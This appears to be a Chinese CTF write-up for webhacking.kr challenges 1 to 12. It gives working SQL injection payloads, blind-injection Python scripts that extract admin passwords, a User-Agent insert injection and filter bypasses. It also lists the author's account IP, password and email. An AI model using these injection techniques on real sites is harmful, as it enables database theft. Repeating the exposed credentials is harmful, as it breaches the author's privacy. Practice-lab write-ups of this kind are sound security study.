内容简介:Hackingweb.kr Writeup算是另外一个韩国的CTFOJ。似乎年龄比solveme.kr长一些,题目还是挺不错的index.phps
Hackingweb.kr Writeup
算是另外一个韩国的CTFOJ。似乎年龄比solveme.kr长一些,题目还是挺不错的
账号
ip 58.40.138.191 id shaoba0 pw 348959214 email shaobaobaoer@126.com
web-1
index.phps
<?
if(!$_COOKIE[user_lv])
{
SetCookie("user_lv","1");
echo("<meta http-equiv=refresh content=0>");
}
?>
<?
$password="????";
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>5) @solve();
echo("<br>level : $_COOKIE[user_lv]");
?>
很简单,吧user_lv改成 5.5 就可以了
web-02
进去一个好大的网页
在index.php处查看源码可以找到隐藏的admin页面
<area shape="rect" coords="592,63,651,92" href="bbs/index.php" target="" alt="" />
<area shape="rect" coords="662,64,745,93" href="fun.php" target="" alt="" />
<area shape="rect" coords="756,63,825,93" href="contact.php" target="" alt="" />
<area shape="rect" coords="851,7,890,65" href="admin/" target="" alt="" />
</map>
点击进入发现要输入密码。
另外发现有一个地方也要输入密码
在cookie处有一个时间戳有点古怪,查看源码的时候会在注释中显示我们现在的时间。除去session外,也只有这个cookie是突破口了。
Cookie: time=1534988192 and 1=0--+; PHPSESSID=shaobao >> <!--2070-01-01 09:00:00--></td> Cookie: time=1534988192 and 1=1--+; PHPSESSID=shaobao >> <!--2070-01-01 09:00:01--></td>
通过改cookie可以达到注入的目的,另外不能用井号,似乎被过滤了。
脚本也是比价坑的,疑似information之类的字段被过滤,需要直接猜。
脚本如下所示
def __init__(self):
self.url = 'http://webhacking.kr/challenge/web/web-02/'
def half_ascii_data(self):
# column email_id = 0x656d61696c5f6964
# table emails = 0x656d61696c73
url = self.url
payload = " and ascii(substr((select password from admin),%s,1))>%s--+"
data = ""
print("Start to retrive the password from admin")
for i in range(1, 20):
max = 127 # z
min = 32 # A
while abs(max - min) > 1:
mid = int((max + min) / 2)
p = payload % (str(i), str(mid))
header = {
'Cookie':'time=1534988192'+p+';PHPSESSID=shaobao'
}
# print(header)
response = requests.get(url,headers=header)
# print(response.text)
# print(re.findall(r"<!--(.*?)-->",response.text))
if response.text.find("09:00:01") != -1:
min = mid
else:
max = mid
data = data + chr(max)
print("the data is :%s" % data)
得到0nly_admin的密码,翻译如下
管理页面
通知
- 小心不要让管理员密码泄露。
- 对于初次使用的用户,请参阅手册(手动密码:@ dM1n__nnanual)
另外那个board地方的密码也可以注入,表名为FreeB0aRd
通过注入得到密码为
the data is :7598522ae
下载下来是一个压缩包,利用密码 @dM1n__nnanual 打开
可以得到如下信息
패스워드는 HacKed_by_n0b0dY 입니다.
FLAG 应该就是这个了,就是不知道去哪里提交
WEB-3
最后拼成了个这样的东西。多试试就知道,5表示连续的5个黑格子,1 1 1 表示间隔开的三个黑格子以此类推
之后进入一个页面让我输入名字,BP抓包有另一个参数,对其进行注入。发现 --+,#,=,',or,and 都被过滤,用 || 1 可以绕过
最后的flag是 answer : new_sql_injection
WEB-4
能够解两次sha1的网站不多,给大家推荐一个网站 Hashkiller
B64解密,SHA1解密,SHA1解密得到test。
WEB-5
join.php需要输入路径才能访问,得到下面一串长相诡异的JS
l='a';ll='b';lll='c';llll='d';lllll='e';llllll='f';lllllll='g';llllllll='h';lllllllll='i';llllllllll='j';lllllllllll='k';llllllllllll='l';lllllllllllll='m';llllllllllllll='n';lllllllllllllll='o';llllllllllllllll='p';lllllllllllllllll='q';llllllllllllllllll='r';lllllllllllllllllll='s';llllllllllllllllllll='t';lllllllllllllllllllll='u';llllllllllllllllllllll='v';lllllllllllllllllllllll='w';llllllllllllllllllllllll='x';lllllllllllllllllllllllll='y';llllllllllllllllllllllllll='z';I='1';II='2';III='3';IIII='4';IIIII='5';IIIIII='6';IIIIIII='7';IIIIIIII='8';IIIIIIIII='9';IIIIIIIIII='0';li='.';ii='<';iii='>';lIllIllIllIllIllIllIllIllIllIl=lllllllllllllll+llllllllllll+llll+llllllllllllllllllllllllll+lllllllllllllll+lllllllllllll+ll+lllllllll+lllll;
lIIIIIIIIIIIIIIIIIIl=llll+lllllllllllllll+lll+lllllllllllllllllllll+lllllllllllll+lllll+llllllllllllll+llllllllllllllllllll+li+lll+lllllllllllllll+lllllllllllllll+lllllllllll+lllllllll+lllll;if(eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl)==-1) { bye; }if(eval(llll+lllllllllllllll+lll+lllllllllllllllllllll+lllllllllllll+lllll+llllllllllllll+llllllllllllllllllll+li+'U'+'R'+'L').indexOf(lllllllllllll+lllllllllllllll+llll+lllll+'='+I)==-1){alert('access_denied');history.go(-1);}else{document.write('<font size=2 color=white>Join</font><p>');document.write('.<p>.<p>.<p>.<p>.<p>');document.write('<form method=post action='+llllllllll+lllllllllllllll+lllllllll+llllllllllllll+li+llllllllllllllll+llllllll+llllllllllllllll
+'>');document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name='+lllllllll+llll+' maxlength=5></td></tr>');document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name='+llllllllllllllll+lllllllllllllllllllllll+' maxlength=10></td></tr>');document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');}
实际上解下来就这样,前面的waf意义不是很大
document.write('<font size=2 color=white>Join</font><p>');
document.write('.<p>.<p>.<p>.<p>.<p>');
document.write('<form method=post action='+'join.php'+ '>');
document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name=' +'id' + ' maxlength=5></td></tr>');
document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name=' + 'pw' + ' maxlength=10></td></tr>');
document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');
所以我们只要post id 和 pw参数即可。
这里的考点是如果注册 'admin ':'1234'的话会把原本admin的密码给改了,算是一个比较陈旧的考点。
随后用 'admin':'1234'的用户名密码登录
WEB-6
先拿到源码如下
<?php
if(!$_COOKIE[user])
{
$val_id="guest";
$val_pw="123qwe";
for($i=0;$i<20;$i++)
{
$val_id=base64_encode($val_id);
$val_pw=base64_encode($val_pw);
}
$val_id=str_replace("1","!",$val_id);
$val_id=str_replace("2","@",$val_id);
$val_id=str_replace("3","$",$val_id);
$val_id=str_replace("4","^",$val_id);
$val_id=str_replace("5","&",$val_id);
$val_id=str_replace("6","*",$val_id);
$val_id=str_replace("7","(",$val_id);
$val_id=str_replace("8",")",$val_id);
$val_pw=str_replace("1","!",$val_pw);
$val_pw=str_replace("2","@",$val_pw);
$val_pw=str_replace("3","$",$val_pw);
$val_pw=str_replace("4","^",$val_pw);
$val_pw=str_replace("5","&",$val_pw);
$val_pw=str_replace("6","*",$val_pw);
$val_pw=str_replace("7","(",$val_pw);
$val_pw=str_replace("8",")",$val_pw);
Setcookie("user",$val_id);
Setcookie("password",$val_pw);
echo("<meta http-equiv=refresh content=0>");
}
?>
<html>
<head>
<title>Challenge 6</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
</style>
</head>
<body>
<?
$decode_id=$_COOKIE[user];
$decode_pw=$_COOKIE[password];
$decode_id=str_replace("!","1",$decode_id);
$decode_id=str_replace("@","2",$decode_id);
$decode_id=str_replace("$","3",$decode_id);
$decode_id=str_replace("^","4",$decode_id);
$decode_id=str_replace("&","5",$decode_id);
$decode_id=str_replace("*","6",$decode_id);
$decode_id=str_replace("(","7",$decode_id);
$decode_id=str_replace(")","8",$decode_id);
$decode_pw=str_replace("!","1",$decode_pw);
$decode_pw=str_replace("@","2",$decode_pw);
$decode_pw=str_replace("$","3",$decode_pw);
$decode_pw=str_replace("^","4",$decode_pw);
$decode_pw=str_replace("&","5",$decode_pw);
$decode_pw=str_replace("*","6",$decode_pw);
$decode_pw=str_replace("(","7",$decode_pw);
$decode_pw=str_replace(")","8",$decode_pw);
for($i=0;$i<20;$i++)
{
$decode_id=base64_decode($decode_id);
$decode_pw=base64_decode($decode_pw);
}
echo("<font style=background:silver;color:black> HINT : base64 </font><hr><a href=index.phps style=color:yellow;>index.phps</a><br><br>");
echo("ID : $decode_id<br>PW : $decode_pw<hr>");
if($decode_id=="admin" && $decode_pw=="admin")
{
@solve(6,100);
}
?>
虽然代码又臭又长,可一开始的替换可以忽略,接着是base64解密20次,解密之后的值如果和admin相等的话,就能通过了。
from base64 import b64encode
a = "admin"
for i in range(20):
a=b64encode(a)
print (a)
WEB-07
<?
$answer = "????";
$go=$_GET[val];
if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }
$ck=$go;
$ck=str_replace("*","",$ck);
$ck=str_replace("/","",$ck);
echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");
if(eregi("--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|<>|sysM|and|or|table|column",$ck)) exit("Access Denied!");
if(eregi(' ',$ck)) { echo('cannot use space'); exit(); }
$rand=rand(1,5);
if($rand==1)
{
$result=@mysql_query("select lv from lv1 where lv=($go)") or die("nice try!");
}
...// 每个随机数对应不同的 sql 语句,选出来的结果是一样的
$data=mysql_fetch_array($result);
if(!$data[0]) { echo("query error"); exit(); }
if($data[0]!=1 && $data[0]!=2) { exit(); }
echo("<!-- admin mode : val=2 -->");
if($data[0]==2)
{
echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=
alert('Congratulation')><p>");
@solve();
}
随机数的话多试几次总有和payload一样的。我们需要 union select 2 。空格被过滤,/**/也被过滤了。可以用%0a %0b来代替。2被过滤,可以用3-1来代替。当rand为1的时候,构造的payload如下所示
0)%0aunion%0aselect%0a3-1(
以上payload并不成功,因为管理员开启了全局的Apache mod_security tool,我在stackoverflow上查到了这样的 帖子
由于 * 会被替换为空,所以用 * 把关键字隔开即可
0)%0au*ni*on%0ase*le*ct%0a3-1(
即可完成注入
WEB-8
index.phps
<?
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
# 没有过滤 #
# 很明显用 union select 是不能够把admin选出来的,因为过滤比较严格。
# 考虑到下面还有插入的东西,所以正确的思路是把admin插入后再把admin选出来
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
# 此时单引号和反斜杠被过滤了,但是过滤的是 $_SERVER[HTTP_USER_AGENT] 而不是 $agent
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi <b>$ck[0]</b><p>");
if($ck[0]=="admin")
{
@solve();
@mysql_query("delete from lv0");
}
#### 分为两部分看 ######
# 由于这里插入的值是 $agent 也就是说agent的单引号是不会被过滤的
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
# $..$ 表示注入的内容
# insert into lv0 (agent,ip,id) values ('$admin','1.1.1.1','admin')#$' ,'192.168.1.68','guest')
echo("<br><br>done! ($count_ck[0]/70)");
}
- 第一步,注入 agnet
- User-Agent: admin','1.1.1.1','admin')#
- 第二步,拿 flag
- User-Agent: admin
WEB-9
依然是sql注入,这道题的waf比较严格,不能有注释,空格,引号,等号。这注入的姿势还是看WP的。
由于给出了hint。所以id字段是可以被选出来的。由于等号被过滤,所以要用in来完成。脚本如下,爆破速度很慢
Secret hint : length = 11 column : id,no
import requests
import re
class WEB9(object):
def __init__(self):
self.url= "http://webhacking.kr/challenge/web/web-09/index.php?no="
def half_ascii_data(self):
# column email_id = 0x656d61696c5f6964
# table emails = 0x656d61696c73
url = self.url
payload = "if(substr(id,%s,1)in(%s),3,0)"
data = ""
print("Start to retrive the id")
for i in range(1, 20):
max = 127 # z
min = 32 # A
while min<=max:
# mid = int((max + min) / 2)
p = payload % (str(i), str(hex(min)))
header = {
'Cookie':'PHPSESSID=8de23fe44208a0266e2b58050c2351d8'
}
# print(header)
# print(url+p)
response = requests.get(url+p,headers=header)
# print(response.text)
# print(re.findall(r"<br>Secret(.*?)>",response.text))
if response.text.find("Secret") == -1:
min +=1
else:
break
data = data + chr(min)
print("the data is :%s" % data)
if __name__ == '__main__':
WEB9().half_ascii_data()
最终的答案是 ALSRKSWHAQL ;当然这里由于是general_cli的牌序,所以大小写不区分,全部小写 alsrkswhaql 得flag;
WEB-10
查看一波源码
onclick="this.style.posLeft+=1;if(this.style.posLeft==800)this.href='?go='+this.style.posLeft"
有这个东西,传入参数 go=800 提示nohack
加入 Refer参数;成功
WEB-11
$pat="/[1-3][a-f]{5}_.*58.40.138.191.*\tp\ta\ts\ts/";
if(preg_match($pat,$_GET[val])) { echo("Password is ????"); }
只要绕过正则就可以了
第一个必须是数字1-3
第2-6个必须是字母a-f
第7个必须是下划线_
第8个往后是你的ip地址.*任意匹配2个字符,.任意匹配一个字符
3aaaaa_ll58l40l138l191ll p a s s
即可
WEB-12
很简单的一个解JS混淆
把eval用console.log代替即可,可以接到一个这个
if(ck=="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3))
{
alert("Password is "+ck.replace("=",""));
// youaregod~~~~~~~!
}
得到PWD=youaregod~~~~~~~!
提交即可
以上所述就是小编给大家介绍的《Hackingweb.kr 做题记录 (1-12)》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
